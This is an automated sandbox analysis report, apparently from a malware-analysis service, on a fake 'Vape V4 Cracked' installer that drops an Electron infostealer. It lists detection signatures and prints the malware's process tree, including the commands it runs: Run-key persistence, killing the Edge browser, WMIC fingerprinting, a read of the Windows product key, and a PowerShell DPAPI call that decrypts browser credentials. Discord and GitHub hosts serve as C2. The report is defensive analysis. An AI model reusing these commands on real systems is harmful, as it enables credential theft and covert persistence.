Overview
overview
10Static
static
10Vape V4 Cracked.exe
windows7-x64
7Vape V4 Cracked.exe
windows10-2004-x64
9$PLUGINSDI...er.dll
windows7-x64
3$PLUGINSDI...er.dll
windows10-2004-x64
3$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ll.dll
windows7-x64
3$PLUGINSDI...ll.dll
windows10-2004-x64
3OGFnPatcher.exe
windows10-2004-x64
9resources/app.asar
windows7-x64
3resources/app.asar
windows10-2004-x64
3resources/elevate.exe
windows7-x64
3resources/elevate.exe
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3$R0/Uninst...er.exe
windows7-x64
7$R0/Uninst...er.exe
windows10-2004-x64
7Analysis
-
max time kernel
150s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
17-09-2024 05:36
Behavioral task
behavioral1
Sample
Vape V4 Cracked.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Vape V4 Cracked.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SpiderBanner.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SpiderBanner.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/WinShell.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/WinShell.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
OGFnPatcher.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral12
Sample
resources/app.asar
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
resources/app.asar
Resource
win10v2004-20240802-en
Behavioral task
behavioral14
Sample
resources/elevate.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
resources/elevate.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral16
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral20
Sample
$R0/Uninstall OGFnPatcher.exe
Resource
win7-20240704-en
Behavioral task
behavioral21
Sample
$R0/Uninstall OGFnPatcher.exe
Resource
win10v2004-20240802-en
General
-
Target
Vape V4 Cracked.exe
-
Size
83.2MB
-
MD5
d8b516ccd538b7fb0b43887437955737
-
SHA1
80682e6da24c2f43efea4a7c122c8622a083e901
-
SHA256
55309a4905c0c074bb9b488a58314dc58d89dea1a8f6963a367c3a62110592c6
-
SHA512
12c017f28753e859ae13127edb9a859c299d6567d5529d72c01293d7fc949d16f2c2c32edcc720765aea66457807757973ef1d4ecf2a3b74b2108dfed668a42d
-
SSDEEP
1572864:DC/xlZ1DRUH32qZ0QaTY5pONinTIXK7hqsAyUhEvpPLjjW:DYTAPO4nsayyUmxPLW
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OGFnPatcher.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation OGFnPatcher.exe -
Executes dropped EXE 4 IoCs
Processes:
OGFnPatcher.exeOGFnPatcher.exeOGFnPatcher.exeOGFnPatcher.exepid process 720 OGFnPatcher.exe 1396 OGFnPatcher.exe 4572 OGFnPatcher.exe 5824 OGFnPatcher.exe -
Loads dropped DLL 17 IoCs
Processes:
Vape V4 Cracked.exeOGFnPatcher.exeOGFnPatcher.exeOGFnPatcher.exeOGFnPatcher.exepid process 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 720 OGFnPatcher.exe 720 OGFnPatcher.exe 1396 OGFnPatcher.exe 4572 OGFnPatcher.exe 1396 OGFnPatcher.exe 1396 OGFnPatcher.exe 1396 OGFnPatcher.exe 1396 OGFnPatcher.exe 5824 OGFnPatcher.exe 5824 OGFnPatcher.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System32Kernal = "C:\\Users\\Admin\\AppData\\Local\\Programs\\patcher\\OGFnPatcher.exe -silent" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
Processes:
flow ioc 24 raw.githubusercontent.com 28 raw.githubusercontent.com 31 raw.githubusercontent.com 32 raw.githubusercontent.com 55 discord.com 21 raw.githubusercontent.com 29 raw.githubusercontent.com 30 raw.githubusercontent.com 52 discord.com 23 raw.githubusercontent.com 25 raw.githubusercontent.com 26 raw.githubusercontent.com 27 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 39 ipinfo.io 41 ipinfo.io -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 5996 cmd.exe 5168 cmd.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 5860 tasklist.exe 876 tasklist.exe 4512 tasklist.exe 5868 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exetasklist.exefind.exeVape V4 Cracked.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Vape V4 Cracked.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
OGFnPatcher.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 OGFnPatcher.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz OGFnPatcher.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString OGFnPatcher.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 OGFnPatcher.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 OGFnPatcher.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz OGFnPatcher.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString OGFnPatcher.exe -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 5964 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
Vape V4 Cracked.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeOGFnPatcher.exepid process 756 Vape V4 Cracked.exe 756 Vape V4 Cracked.exe 876 tasklist.exe 876 tasklist.exe 1620 powershell.exe 1620 powershell.exe 3016 powershell.exe 3016 powershell.exe 1620 powershell.exe 3016 powershell.exe 5636 powershell.exe 5636 powershell.exe 5636 powershell.exe 6052 powershell.exe 6052 powershell.exe 6052 powershell.exe 5256 powershell.exe 5256 powershell.exe 5256 powershell.exe 5824 OGFnPatcher.exe 5824 OGFnPatcher.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeVape V4 Cracked.exeOGFnPatcher.exeWMIC.exetasklist.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 876 tasklist.exe Token: SeSecurityPrivilege 756 Vape V4 Cracked.exe Token: SeShutdownPrivilege 720 OGFnPatcher.exe Token: SeCreatePagefilePrivilege 720 OGFnPatcher.exe Token: SeIncreaseQuotaPrivilege 3564 WMIC.exe Token: SeSecurityPrivilege 3564 WMIC.exe Token: SeTakeOwnershipPrivilege 3564 WMIC.exe Token: SeLoadDriverPrivilege 3564 WMIC.exe Token: SeSystemProfilePrivilege 3564 WMIC.exe Token: SeSystemtimePrivilege 3564 WMIC.exe Token: SeProfSingleProcessPrivilege 3564 WMIC.exe Token: SeIncBasePriorityPrivilege 3564 WMIC.exe Token: SeCreatePagefilePrivilege 3564 WMIC.exe Token: SeBackupPrivilege 3564 WMIC.exe Token: SeRestorePrivilege 3564 WMIC.exe Token: SeShutdownPrivilege 3564 WMIC.exe Token: SeDebugPrivilege 3564 WMIC.exe Token: SeSystemEnvironmentPrivilege 3564 WMIC.exe Token: SeRemoteShutdownPrivilege 3564 WMIC.exe Token: SeUndockPrivilege 3564 WMIC.exe Token: SeManageVolumePrivilege 3564 WMIC.exe Token: 33 3564 WMIC.exe Token: 34 3564 WMIC.exe Token: 35 3564 WMIC.exe Token: 36 3564 WMIC.exe Token: SeDebugPrivilege 4512 tasklist.exe Token: SeIncreaseQuotaPrivilege 2424 WMIC.exe Token: SeSecurityPrivilege 2424 WMIC.exe Token: SeTakeOwnershipPrivilege 2424 WMIC.exe Token: SeLoadDriverPrivilege 2424 WMIC.exe Token: SeSystemProfilePrivilege 2424 WMIC.exe Token: SeSystemtimePrivilege 2424 WMIC.exe Token: SeProfSingleProcessPrivilege 2424 WMIC.exe Token: SeIncBasePriorityPrivilege 2424 WMIC.exe Token: SeCreatePagefilePrivilege 2424 WMIC.exe Token: SeBackupPrivilege 2424 WMIC.exe Token: SeRestorePrivilege 2424 WMIC.exe Token: SeShutdownPrivilege 2424 WMIC.exe Token: SeDebugPrivilege 2424 WMIC.exe Token: SeSystemEnvironmentPrivilege 2424 WMIC.exe Token: SeRemoteShutdownPrivilege 2424 WMIC.exe Token: SeUndockPrivilege 2424 WMIC.exe Token: SeManageVolumePrivilege 2424 WMIC.exe Token: 33 2424 WMIC.exe Token: 34 2424 WMIC.exe Token: 35 2424 WMIC.exe Token: 36 2424 WMIC.exe Token: SeIncreaseQuotaPrivilege 2368 WMIC.exe Token: SeSecurityPrivilege 2368 WMIC.exe Token: SeTakeOwnershipPrivilege 2368 WMIC.exe Token: SeLoadDriverPrivilege 2368 WMIC.exe Token: SeSystemProfilePrivilege 2368 WMIC.exe Token: SeSystemtimePrivilege 2368 WMIC.exe Token: SeProfSingleProcessPrivilege 2368 WMIC.exe Token: SeIncBasePriorityPrivilege 2368 WMIC.exe Token: SeCreatePagefilePrivilege 2368 WMIC.exe Token: SeBackupPrivilege 2368 WMIC.exe Token: SeRestorePrivilege 2368 WMIC.exe Token: SeShutdownPrivilege 2368 WMIC.exe Token: SeDebugPrivilege 2368 WMIC.exe Token: SeSystemEnvironmentPrivilege 2368 WMIC.exe Token: SeRemoteShutdownPrivilege 2368 WMIC.exe Token: SeUndockPrivilege 2368 WMIC.exe Token: SeManageVolumePrivilege 2368 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Vape V4 Cracked.execmd.exeOGFnPatcher.execmd.execmd.execmd.exedescription pid process target process PID 756 wrote to memory of 3592 756 Vape V4 Cracked.exe cmd.exe PID 756 wrote to memory of 3592 756 Vape V4 Cracked.exe cmd.exe PID 756 wrote to memory of 3592 756 Vape V4 Cracked.exe cmd.exe PID 3592 wrote to memory of 876 3592 cmd.exe tasklist.exe PID 3592 wrote to memory of 876 3592 cmd.exe tasklist.exe PID 3592 wrote to memory of 876 3592 cmd.exe tasklist.exe PID 3592 wrote to memory of 1116 3592 cmd.exe find.exe PID 3592 wrote to memory of 1116 3592 cmd.exe find.exe PID 3592 wrote to memory of 1116 3592 cmd.exe find.exe PID 720 wrote to memory of 3632 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 3632 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 1092 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 1092 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 4092 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 4092 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 4272 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 4272 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 1008 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 1008 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 2140 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 2140 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 3760 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 3760 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 764 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 764 720 OGFnPatcher.exe cmd.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 1396 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 4572 720 OGFnPatcher.exe OGFnPatcher.exe PID 720 wrote to memory of 4572 720 OGFnPatcher.exe OGFnPatcher.exe PID 1092 wrote to memory of 3564 1092 cmd.exe WMIC.exe PID 1092 wrote to memory of 3564 1092 cmd.exe WMIC.exe PID 1092 wrote to memory of 4164 1092 cmd.exe more.com PID 1092 wrote to memory of 4164 1092 cmd.exe more.com PID 3632 wrote to memory of 4512 3632 cmd.exe tasklist.exe PID 3632 wrote to memory of 4512 3632 cmd.exe tasklist.exe PID 4272 wrote to memory of 5056 4272 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vape V4 Cracked.exe"C:\Users\Admin\AppData\Local\Temp\Vape V4 Cracked.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq OGFnPatcher.exe" /FO csv | "C:\Windows\system32\find.exe" "OGFnPatcher.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\tasklist.exetasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq OGFnPatcher.exe" /FO csv3⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\find.exe"C:\Windows\system32\find.exe" "OGFnPatcher.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1116
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4400,i,3239535018877284530,3457823197501312703,262144 --variations-seed-version --mojo-platform-channel-handle=3768 /prefetch:81⤵PID:648
-
C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe"C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size | more +1"2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get size3⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\system32\more.commore +13⤵PID:4164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:4092
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption, osarchitecture3⤵PID:5056
-
-
C:\Windows\system32\more.commore +13⤵PID:3548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"2⤵PID:1008
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:4656
-
-
C:\Windows\system32\more.commore +13⤵PID:3640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"2⤵PID:2140
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\system32\more.commore +13⤵PID:1896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:3760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe"C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2212,i,18047690900480208470,11383549284962149404,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1396
-
-
C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe"C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --field-trial-handle=2432,i,18047690900480208470,11383549284962149404,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=720 get ExecutablePath"2⤵PID:5176
-
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=720 get ExecutablePath3⤵PID:5316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe -silent" /f"2⤵PID:5448
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe -silent" /f3⤵
- Adds Run key to start application
PID:5496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:5588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5772
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5780
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"2⤵PID:5920
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F3⤵
- Kills process with taskkill
PID:5964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,154,123,243,186,229,243,165,73,184,31,35,117,130,37,220,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,230,154,7,177,73,202,35,244,87,43,183,163,2,194,47,242,25,129,217,83,84,57,103,121,100,190,224,133,177,158,96,147,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,228,141,206,137,161,148,106,117,234,227,41,0,6,114,113,65,12,243,65,222,88,181,135,92,190,88,173,21,89,0,168,48,0,0,0,146,28,122,163,252,29,72,126,200,149,12,81,238,87,22,116,104,25,108,247,197,221,25,217,160,15,33,220,194,148,198,129,111,68,157,85,177,235,171,71,111,165,51,222,33,72,44,27,64,0,0,0,54,178,77,95,167,247,246,149,63,143,4,122,246,95,242,51,233,184,148,193,79,210,56,245,252,96,92,193,59,134,67,54,30,221,105,226,186,150,140,5,20,228,235,140,95,253,133,100,20,106,76,192,177,147,41,237,7,77,252,0,129,229,233,80), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,154,123,243,186,229,243,165,73,184,31,35,117,130,37,220,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,230,154,7,177,73,202,35,244,87,43,183,163,2,194,47,242,25,129,217,83,84,57,103,121,100,190,224,133,177,158,96,147,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,228,141,206,137,161,148,106,117,234,227,41,0,6,114,113,65,12,243,65,222,88,181,135,92,190,88,173,21,89,0,168,48,0,0,0,146,28,122,163,252,29,72,126,200,149,12,81,238,87,22,116,104,25,108,247,197,221,25,217,160,15,33,220,194,148,198,129,111,68,157,85,177,235,171,71,111,165,51,222,33,72,44,27,64,0,0,0,54,178,77,95,167,247,246,149,63,143,4,122,246,95,242,51,233,184,148,193,79,210,56,245,252,96,92,193,59,134,67,54,30,221,105,226,186,150,140,5,20,228,235,140,95,253,133,100,20,106,76,192,177,147,41,237,7,77,252,0,129,229,233,80), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
-
